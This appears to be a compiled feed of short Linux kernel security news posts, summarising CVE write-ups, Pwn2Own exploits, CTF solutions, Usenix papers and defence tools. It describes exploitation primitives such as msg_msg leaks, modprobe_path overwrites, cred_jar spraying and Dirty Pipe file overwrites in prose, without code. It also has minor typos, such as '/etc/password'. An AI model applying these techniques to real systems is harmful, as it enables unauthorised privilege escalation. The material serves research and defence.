Struggle with slab freelist hardening in a CTF task

Kileak described the solution of a kernel task IPS from VULNCON CTF. The researcher had a hard fight against SLAB_FREELIST_RANDOM and SLAB_FREELIST_HARDENED.

Ubuntu LPE exploit from Pwn2Own

Flatt Security published a whitepaper on exploiting Linux kernel eBPF vuln leading to OOB RW primitive.

They used it against Ubuntu Desktop 20.10 at Pwn2Own 2021.

Nice improvement in my Linux Kernel Defence Map.

See how the Control Flow Hijack part looks now ⬆️

I'd appreciate your feedback.

Attacking Samsung RKP

An article by Alexandre Adamski about vulnerabilities in Real-time Kernel Protection of Samsung phones. Two of the found bugs allow bypassing certain RKP restrictions, and the third one allows to compromise RKP itself.

The article is a follow-up to A Samsung RKP Compendium, which describes the internals of Samsung RKP.

Usenix 2021

Papers on Linux kernel security presented at Usenix back in August:

— SyzVegas: Beating Kernel Fuzzing Odds with Reinforcement Learning [paper] [slides] [video] presented by Daimeng Wang.

— ExpRace: Exploiting Kernel Races through Raising Interrupts [paper] [slides] [video] presented by Yoochan Lee.

— SHARD: Fine-Grained Kernel Specialization with Context-Aware Hardening [paper] [slides] [video] presented by Muhammad Abubakar.

— Detecting Kernel Refcount Bugs with Two-Dimensional Consistency Checking [paper] [slides] [video] presented by Xin Tan.

— An Investigation of the Android Kernel Patch Ecosystem [paper] [slides] [video] presented by Zheng Zhang.

— Undo Workarounds for Kernel Bugs [paper] [slides] [video] presented by Seyed Mohammadjavad Seyed Talebi.

— An Analysis of Speculative Type Confusion Vulnerabilities in the Wild [paper] [slides] [video] presented by Ofek Kirzner.

CVE-2021-44733: Fuzzing and exploitation of a use-after-free in the Linux kernel TEE subsystem

An article about a bug in the Trusted Execution Environment subsystem. By Patrik Lantz.

The bug was found by syzkaller; denoscriptions are included in the article. An exploit for controlling PC is also provided along with instructions for reproducing. The exploit does not bypass PAN.

Automated RE of Kernel Configurations

Brandon Miller published an article about his Binary Ninja plugin that analyzes Linux kernel binaries to recover kernel configuration options.

This tool is called bn-kconfig-recover. It can help when a kernel binary has CONFIG_IKCONFIG disabled.

Not all kconfig options are supported. Work on this tool is in progress.

Linux kernel exploit development tutorial

ChrisTheCoolHut published a GitBook tutorial about writing Linux kernel exploits along with the source code for tasks and their solutions.

CVE-2021-45608: NetUSB RCE Flaw in Millions of End User Routers

Max Van Amerongen published an analysis of a vulnerability in the NetUSB proprietary driver, which is used in products of many network device vendors.

The researcher briefly describes the exploitation strategy but does not share many details.

CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google's KCTF Containers

An article describing an exploit for a slab-out-of-bounds bug in the fsconfig syscall handler. By FizzBuzz101, @clubby789, @ryaagard, @Chronos190, @ginkoid, and @chop0_.

Authors managed to both get LPE on the Ubuntu kernel and escape the kCTF infrastructure container, and thus claim the kCTF VRP bounty.

The bug was found with syzkaller, and it was also reported by syzbot.

CVE-2022-0185: Linux kernel slab out-of-bounds write: exploit and writeup

An article by @lockedbyte with another write-up for the slab-out-of-bounds bug in the fsconfig syscall handler. The exploit is attached to the oss-security post.

CVE-2022-0435: Linux Kernel Remote Stack Overflow

Samuel Page disclosed remotely and locally reachable stack overflow in Transparent Inter-Process Communication (TIPC).

This bug exists since kernel version 4.8. For RCE, a vulnerable system must have TIPC module loaded and TIPC bearer enabled.

Samuel also posted a funny overview of his experience in disclosing Linux kernel vulnerabilities.

Linux kernel Use-After-Free (CVE-2021-23134) PoC

An article by @Awarau1 about exploiting a use-after-free in NFC sockets to leak /etc/shadow.

Amusingly, uses TeX formatting on web to explain the exploit.

Zenith: Linux kernel RCE exploit for NetUSB driver

Axel Souchet published the Zenith exploit used at Pwn2Own Austin 2021.

Zenith exploits a memory corruption vulnerability in the NetUSB proprietary driver to get remote code execution on the TP-Link Archer C7 V5 router.

This router has no KASLR and executable kernel heap (unbelievable!).

CVE-2022-0185: Exploiting a kernel heap buffer overflow for LPE

clubby789 published a detailed write-up about discovering and exploiting CVE-2022-0185 in the FS subsystem of the Linux kernel.

Exploit primitives:
▪️Kernel pointer leak and arbitrary writing using msg_msg
▪️Exploiting FUSE to control the race condition
▪️Overwriting the modprobe_path for privilege escalation

How to simplify exploiting CVE-2021-26708 using sshd

HardenedVault published a nice write-up that describes how to simplify my PoC exploit for CVE-2021-26708 in the Linux kernel.

They discovered how to perform heap spraying in the cred_jar slab cache for privilege escalation.

The Dirty Pipe Vulnerability

An article by Max Kellermann about Dirty Pipe — a logical bug in the memory subsystem that allows writing to read-only files. The provided proof-of-concept works starting from Linux kernel version 5.8 released in August 2020.

The exploit makes the kernel merge a page cache entry belonging to a read-only file with another entry belonging to a pipe and thus writable by the user. This allows overwriting the in-memory contents of the read-only file.

Extending the proof-of-concept provided by Max Kellermann, Blasty has published an exploit for overwriting the contents of a SUID binary and getting root privileges.

Update: Another exploit. This one overwrites /etc/password. By Arinerron.

Exploiting CVE-2021-41073 in io_uring

Valentina Palmiotti published an excellent write-up about exploiting a type confusion in io_uring to gain root privileges.

This bug allows freeing arbitrary slab allocations from the kmalloc-32 cache.

Valentina described how she constructed these exploit primitives:

✔️ UAF in kmalloc-32
✔️ Kernel heap info-leak
✔️ Control flow hijacking
✔️ Illegal privilege escalation

The researcher also described her experience with responsible disclosure.

Compilers: The Old New Security Frontier

Brad Spengler published the slides from his talk at BlueHat IL 2022.

He gave an overview of open problems in operating system security and described how compiler plugins could help.

The Discovery and Exploitation of CVE-2022-25636

Nick Gregory published an article about exploiting a heap out-of-bounds write in netfilter. The researcher managed to hijack the kernel control flow.

Racing against the clock — hitting a tiny kernel race window

An article by Jann Horn on using hardware timers to widen race condition windows.

Jann applied his method to a race condition in the garbage collector for unix sockets, which had a race window of only 12 instructions.

The article also contains Jann's investigations on the precision of hardware timers in Intel CPUs.